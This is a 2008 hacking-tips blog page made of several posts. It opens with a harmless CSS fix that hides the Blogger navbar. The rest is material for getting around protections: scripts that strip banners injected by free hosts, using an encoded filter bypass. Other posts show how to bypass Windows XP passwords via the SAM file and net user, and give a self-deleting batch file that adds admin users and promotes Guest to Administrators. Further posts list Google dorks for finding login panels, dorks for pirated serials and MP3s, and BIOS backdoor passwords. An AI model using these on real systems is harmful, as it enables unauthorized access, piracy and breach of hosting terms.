Saturday, November 1, 2008

Remove Bloggers Nav bar

First off, what is the Blogger Navbar?
The Blogger Navbar appears by default at the top of every Blogger-powered blog. It is available in several colors, and is configured in the Template tab in Blogger’s interface. If you are using a classic template, you’ll see a menu from which you can select a color. For blogs using Layouts, just click the “edit” link on the Navbar page element. Blogger gives a more detailed explanation of this here.

There are several reasons why I think it’s important to remove the Blogger nav bar but I’ll name my two most important reasons. First one being that it’s an eye sore and makes your blog look less professional. Secondly, when you click on the “next blog” button you never know what type of blog you might stumble upon. There are so many spam blogs with adult content or other information you don’t want young people to read. When you do block the navbar on your own blog, you prevent others from also easily leaving your site and accidentally heading to one of these spam sites.

blogger navbar

Unfortunately Blogger doesn’t give you the option to remove the navbar easily but this simple modification to your template allows us to hide it. The good news is that it’s not against Blogger’s TOS so it’s not illegal to do. I read a post recently by Blogger Support that stated

While it’s not officially against our TOS, we discourage folks from removing it because we think it’s a great feature with more improvements to come. Follow the above instructions at your own peril, as Blogger controls the TOS and has been known to change it.

So the change you want to make is to the stylesheet. First make sure you backup your current template just in case you make a mistake. Click on the “Download Full Template” link ( go to “Template” => “Edit HTML”) and save it locally. Next, from within your template code you want to scroll down until you find ]]> and stop. Then you’ll want to add this line of code right above this line.

#navbar-iframe {height:0px;visibility:hidden;display:none}

So once you’re done, it should look like this:

#navbar-iframe {height:0px;visibility:hidden;display:none}  ]]>

After that, save your template and view your blog. The top Blogger navbar should have disappeared! Looks much better now doesn’t it? If you ever want to add the navbar back, it’s simple. Just remove the line of code we just added. Also, if you ever switch templates, make sure to follow these instructions again because it needs to be done with each new template you use.

Continue reading →

Create your own browser

Now u can create ur own web browser

1. open notepad

2. paste the following code in notepad


3. and save with any name .hta
HERE is the Demo



coded By:
Pradeep  bhandspradeep@gmail.com
visit us at
Ethical Hacikng

for the code pls contact me 
Continue reading →

Removing Banners


So you have a website hosted in any
of those free web space providing company like Tripod, Focusindia, Geocities,
Virtualave etc. but the banner really irritates you and acts as an odd
object in your site’s interface layout. In this manual I am going
to figure out some kewl methods of removing those bannners, the code
of which is inserted by the server when you upload your pages to the
server by means of FTP or HTTP file transfer.
 


When you upload your pages to the web 
server of a free web hosting company which will put a banner ad or a
popup window in your site as a part of signup contract which you have
agreed during signing up for your account, what happens is that the
server automatically inserts some prewritten HTML or JavaScript code
into particular part of your HTML file which is responsible for the
display of those banners.
 


Before explaining the methods I’ll
use to remove the banners inserted by the server I must say that the
programmers of those company changes their code for display of banner
after regular interval so the methods which I will describe today may
not be applicable after a month or so. But today all the methods are
working and effective.
 


Focusindia [http://www.focusindia.com] 


Just Add the tag <noframes> before
ending body.. ie </body>
 


Peoples who dont know HTML.. open ur
HTML page in notepad and search for </body> ...


after u find it just add <noframes>
before </body>
 


Your HTML coding will look like this


<html>


<head>


<title>kkk</title>


<script></script>


</head>


<body> 


your webpage coding goes here.. 


<noframes> <!-- This
is where you should add -->


</body>


</html> 
 


Virtualave [http://www.virtualave.net] 


After <Head> tag ( and after
<meta> tags or <style> tags if any) before any other Java
Script add this piece of code :
 


<script language="javas&#67;ript>
<!-- Encrypting the word Java Script to bypass Java Script Filters-->


function open(){}


</script> 
 


<script language="javas&#67;ript>
<!-- Encrypting the word Java Script to bypass Java Script Filters..
&#67; is the ASCII for c -->


function popWin(){}


</script> 


note: this method is not fullproof..
I do respect the programmers of Virtualave for their exceptional banner
insertion coding..
 
 


Tripod [http://www.tripod.com] 


After <Head> tag ( and after
<title>, <meta> tags or <style> tags if any) before
any other Java Script add this piece of code :
 


<script language="javas&#67;ript>
<!-- Encrypting the word Java Script to bypass Java Script Filters-->


function ShowTripodPopup(){}


</script> 


<script language="javas&#67;ript>
<!-- Encrypting the word Java Script to bypass Java Script Filters-->


function open(){}


</script> 


PROHOSTING [http://free.prohosting.com] 


first add <killbanner> tag after
<head> in your html coding..
 


put this piece of code after <head>
and <killbanner> (and ofcourse <title> or <style>
tag if any) tag before any other script..
 


<script language="javas&#67;ript>
<!-- Encrypting the word Java Script to bypass Java Script Filters-->


function open(){}


</script> 


your coding will look like this: 


<html>


<head>


<title> Sorry guys.. ur coding
aint upto the mark </title>


<killbanner>


<style> <!—your style codings
-- > </style>


<script language="javas&#67;ript>
<!-- Encrypting the word Java Script to bypass Java Script Filters-->


function open(){}


</script>


</head>


<body> 


<!—Your HTML coding goes here
-- >
 


</body>


</html>


HTML programmers note: you must
be wondering what kind of tag <killbanner> is.. never hear about
it.. is it a tag included in some new version of HTML. You must be thinking
like this.. right guys.. well nothing to think.. its not at all a HTML
tag.. the free.prohosting.com server is designed to scan the HTML coding
of your uploaded pages and if it find the <killbanner> tag then
it will insert coding for popup windows else it will insert coding for
a banner at the top of your site..
 
 


NETFIRMS [http://www.netfirms.com] 


This site is quite smart. What they
do is insert <iframe> tag for banner insertion just after <body>
tag in our HTML code so what I have done is enclosed the <body>
tag by <noframes></noframes> tag so that the <iframe>
tag inserted by the server just after body don’t work..
 


Take a look at the coding below.. 


<html>


<head>


<title> Faking Netfirms </title>


</head>


<noframes>


<body> 


<!—Server code will come here..
as a result of <noframes> tag it wont work -- >
 


</noframes> 


<!-- YOUR ACTUAL HTML CODING GOES
HERE -->
 


<b>


welcome to Hackersclub


<a href=”http://hackersclub.up.to”>http://hackersclub.up.to</a>


</b> 


</body>


</html> 


FREESERVERS AND 50 MEGS [http://www.freeservers.com
http://www.50megs.com]
 


First log in to your 50megs or freeservers
account and from the customize banner option select popup banner. 
Now the banner wont be displayed in your page but it will be displayed
in popup window..
 


Now the trick comes..almost the same
as most other websites.. same lame server code insertion..
 


Put this piece of code after <head>
(after <title> and <style> if you have) before any other
<script>
 


<script language="javas&#67;ript>
<!-- Encrypting the word Java Script to bypass Java Script Filters-->


function open(){}


</script> 


Note: Freeservers and 50megs regularly
changes their banner insertion method and coding. When I have checked
their site this method was fully working. Now if it doesn’t work please
let me know about it so that I can write some new code to trick them..
 

 
 
 


Note one thing, you website will definitely
be cancelled if your hosting company caught you red handed.. I mean
if they find out that you are bypassing the banner insertion code..
 














Continue reading →

Breaking the XP password


Breaking the XP password

In case of user password boot the pc in safemode by pressing the F8 key and then selecting the Safe Mode option. You can now logon as an administrator and XP wont prompt for the password. Incase of an administrator account try rebooting the pc in DOS. access C:\Windows\system32\config\sam . Rename SAM as SAM.mj
Now XP wont ask for password next time You Login. Also

Go to the cmd prompt .
Type net user *.
It will list all the users.
Again type net user "administrator" or the name of the administrator "name" *.
e.g.: net user aaaaaa *(where aaaaaa is the name).
It will ask for the password.
Type the password and there you are done.
Logging In As Administrator:

Hold the Ctrl-Alt key and press Del twice. This will bring up the normal login and you can log on as Administrator.

To unhide the Administrator account so it does show up:

Start Regedit

Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList

Unhide the Administrator key by giving it a value of 1
Continue reading →

Hack Xp Guest Account To Get Administrator Privilages

Hack Xp Guest Account To Get Administrator Privilages


HaCk “GUEST” with Admin privileges……..
echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as “Guest2admin.bat”
then u can double click the file to execute or run in the cmd.
it works…

Continue reading →

Google Login Searches

Google Login Searches

intitle:”remote assessment” OpenAanval Console

intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”

“IMail Server Web Messaging” intitle:login

“Login - Sun Cobalt RaQ”

“Login to Usermin” inurl:20000

“Microsoft CRM : Unsupported Browser Version”

“OPENSRS Domain Management” inurl:manage.cgi

“please log in”

“powered by CuteNews *.* © * CutePHP

“SysCP - login”

“ttawlogin.cgi/?action=”

“VHCS Pro ver” -demo

“VNC Desktop” inurl:5800

“Web Control Panel” “Enter your password here”

“WebExplorer Server - Login” “Welcome to WebExplorer Server”

“WebSTAR Mail - Please Log In”

(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil

4images Administration Control Panel

allinurl:”exchange/logon.asp”

ASP.login_aspx “ASP.NET_SessionId”

CGI:IRC Login

ez Publish administration

filetype:php inurl:”webeditor.php”

filetype:pl “Download: SuSE Linux Openexchange Server CA”

filetype:r2w r2w

intext:”"BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”

intext:”Mail admins login here to administrate your domain.”

intext:”Storage Management Server for” intitle:”Server Administration”

intitle:”Athens Authentication Point”

intitle:”ColdFusion Administrator Login”

intitle:”Dell Remote Access Controller”

intitle:”ePowerSwitch Login”

intitle:”Icecast Administration Admin Page”

intitle:”ISPMan : Unauthorized Access prohibited”

intitle:”ITS System Information” “Please log on to the SAP System”

intitle:”Login - powered by Easy File Sharing Web Server”

intitle:”MailMan Login”

intitle:”microsoft certificate services” inurl:certsrv

intitle:”MikroTik RouterOS Managing Webpage”

intitle:”MX Control Console” “If you can’t remember”

intitle:”Novell Web Services” intext:”Select a service and a language.”

intitle:”oMail-admin Administration - Login” -inurl:omnis.ch

intitle:”Philex 0.2*” -script -site:freelists.org

intitle:”PHP Advanced Transfer” inurl:”login.php”

intitle:”php icalendar administration” -site:sourceforge.net

intitle:”php icalendar administration” -site:sourceforge.net

intitle:”please login” “your password is *”

intitle:”Remote Desktop Web Connection” inurl:tsweb

intitle:”teamspeak server-administration

intitle:”Tomcat Server Administration”

intitle:”TUTOS Login”

intitle:”vhost” intext:”vHost . 2000-2004″

intitle:”Virtual Server Administration System”

intitle:”VitalQIP IP Management System”

intitle:”VNC viewer for Java”

intitle:”WebLogic Server” intitle:”Console Login” inurl:console

intitle:”Welcome Site/User Administrator” “Please select the language” -demos

intitle:”welcome to netware *” -site:novell.com

intitle:”ZyXEL Prestige Router” “Enter password”

intitle:Group-Office “Enter your username and password to login”

intitle:Login * Webmailer

intitle:Login intext:”RT is © Copyright”

intitle:Node.List Win32.Version.3.11

intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”

intitle:plesk inurl:login.php3

inurl:”1220/parse_xml.cgi?”

inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)

inurl:”:10000″ intext:webmin

inurl:”Activex/default.htm” “Demo”

inurl:”calendar.asp?action=login”

inurl:”gs/adminlogin.aspx”

inurl:”typo3/index.php?u=” -demo

inurl:”usysinfo?login=true”

inurl:”utilities/TreeView.asp”

inurl:/admin/login.asp

inurl:/cgi-bin/sqwebmail?noframes=1

inurl:/Citrix/Nfuse17/

inurl:/dana-na/auth/welcome.html

inurl:/eprise/

inurl:/webedit.* intext:WebEdit Professional -html

inurl:1810 “Oracle Enterprise Manager”

inurl:administrator “welcome to mambo”

inurl:cgi-bin/ultimatebb.cgi?ubb=login

inurl:confixx inurl:login|anmeldung

inurl:coranto.cgi intitle:Login (Authorized Users Only)

inurl:default.asp intitle:”WebCommander”

inurl:irc filetype:cgi cgi:irc

inurl:login filetype:swf swf

inurl:login.asp

inurl:login.cfm

inurl:login.php “SquirrelMail version”

inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”

inurl:mewebmail

inurl:names.nsf?opendatabase

inurl:orasso.wwsso_app_admin.ls_login

inurl:postfixadmin intitle:”postfix admin” ext:php

inurl:search/admin.php

Login (”Powered by Jetbox One CMS ยช” | “Powered by Jetstream © *”)

Novell NetWare intext:”netware management portal version”

Outlook Web Access (a better way)
pcANYWHERE EXPRESS Java Client

PhotoPost PHP Upload

PHPhotoalbum Statistics

PHPhotoalbum Upload

phpWebMail

Powered by INDEXU

Ultima Online loginservers

url:”webadmin” filetype:nsf

W-Nailer Upload Area

Continue reading →

Use Gooogle to Find Serial Keys

Use Gooogle to Find Serial Keys

let’s pretend you need a serial number for windows xp pro.
in the search bar type in just like this - “Windows XP Professional” 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of ‘fake’ porn sites that trick you.

or if you want to find the serial for winzip 8.1 - “Winzip 8.1″ 94FBR

just try it out, it’s very quick and it works nicely….
Here is another trick that works fairly decent for finding mp3’s on the web (which is hard to do normally, to say the least)

say you want to get, for example, a Garth Brooks song. type this in the search bar - “index of/” “garth brooks” .mp3 the ones you want to check out first are the ones that say “Index of/” in the title of the search result. this technique allows you to easily pull up web folders with direct downloads. it will look the same as if you were logging into a ftp url.. i’m sure you can be pretty flexible on how you type that in, so long as you include “index of/”

i’m sure you can use this for more than just mp3’s (it’s not perfect but it has worked for me on a few occasions)

always make sure to use the quotations where i placed them. they help pinpoint the correct search results more accurately. just try it out, also if you want to learn how to do more with google look up “google hacks”

Continue reading →

How To Crack BIOS Passwords

How To Crack BIOS Passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to “_” in the US keyboard corresponds to “?” in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

 

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

 

Award BIOS backdoor passwords:

 

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222

589589 589721 595595 598598

 

AMI BIOS backdoor passwords:

 

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

 

PHOENIX BIOS backdoor passwords:

 

phoenix, PHOENIX, CMOS, BIOS

 

MISC. COMMON PASSWORDS

 

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

 

OTHER BIOS PASSWORDS BY MANUFACTURER

 

Manufacturer Password

VOBIS & IBM merlin

Dell Dell

Biostar Biostar

Compaq Compaq

Enox xo11nE

Epox central

Freetech Posterie

IWill iwill

Jetway spooml

Packard Bell bell9

QDI QDI

Siemens SKY_FOX

TMC BIGO

Toshiba Toshiba

 

TOSHIBA BIOS

 

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

 

IBM APTIVA BIOS

 

Press both mouse buttons repeatedly during the boot

Disclaimer: This tutorial is for educational purpose only and we do not take any responsibility for its criminal use.

Continue reading →


 
Copyright 2010 Full version Downloads. All rights reserved.
Themes by Bonard Alfin l Home Recording l Distorsi Blog